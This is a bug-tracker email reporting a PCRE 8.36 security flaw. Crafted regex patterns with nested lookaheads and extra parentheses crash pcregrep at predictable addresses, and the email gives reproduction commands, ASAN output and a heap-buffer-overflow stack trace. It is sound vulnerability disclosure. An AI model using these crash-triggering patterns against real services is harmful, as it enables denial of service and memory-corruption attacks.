------- You are receiving this mail because: -------
You are on the CC list for the bug.
http://bugs.exim.org/show_bug.cgi?id=1548
Summary: SIGSEGV at predictable addresses by adjusting the number
of parentheses in a regex
Product: PCRE
Version: 8.36
Platform: Other
OS/Version: Linux
Status: NEW
Severity: security
Priority: high
Component: Code
AssignedTo: ph10@???
ReportedBy: mikispag@???
CC: pcre-dev@???
Target is compiled with ASAN, version 8.36.
$ pcregrep "(?(?=)?==)(((((((((?=)))))))))" /etc/passwd
==8224==ERROR: AddressSanitizer: SEGV on unknown address 0x60e000015ca6 (pc
0x000000550452 bp 0x7fff8037b1b0 sp 0x7fff80374320 T0)
Adding one ( ) :
$ pcregrep "(?(?=)?==)((((((((((?=))))))))))" /etc/passwd
==8429==ERROR: AddressSanitizer: SEGV on unknown address 0x60f000016c96 (pc
0x000000550452 bp 0x7fffa9643910 sp 0x7fffa963ca80 T0)
Adding (( )) again:
$ pcregrep "(?(?=)?==)((((((((((((?=))))))))))))" /etc/passwd
=================================================================
==16276==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x61000000fc86 at pc 0x00000055044a bp 0x7fffe1658c70 sp 0x7fffe1658c68
READ of size 1 at 0x61000000fc86 thread T0
#0 0x550449 in match
/usr/local/google/home/mikispag/Downloads/pcre-8.36/pcre_exec.c:1410:9
#1 0x53ba23 in pcre_exec
/usr/local/google/home/mikispag/Downloads/pcre-8.36/pcre_exec.c:6923:8
#2 0x4b947c in match_patterns
/usr/local/google/home/mikispag/Downloads/pcre-8.36/pcregrep.c:1449:10
#3 0x4ac77d in pcregrep
/usr/local/google/home/mikispag/Downloads/pcre-8.36/pcregrep.c:1679:11
#4 0x4b3661 in grep_or_recurse
/usr/local/google/home/mikispag/Downloads/pcre-8.36/pcregrep.c:2293:6
#5 0x4a50dd in main
/usr/local/google/home/mikispag/Downloads/pcre-8.36/pcregrep.c:3251:13
#6 0x7fec0c9e3ec4 in __libc_start_main
/build/buildd/eglibc-2.19/csu/libc-start.c:287
#7 0x416ec6 in _start (/usr/bin/pcregrep+0x416ec6)
The addresses are the same for each execution.
--
Configure bugmail:
http://bugs.exim.org/userprefs.cgi?tab=email
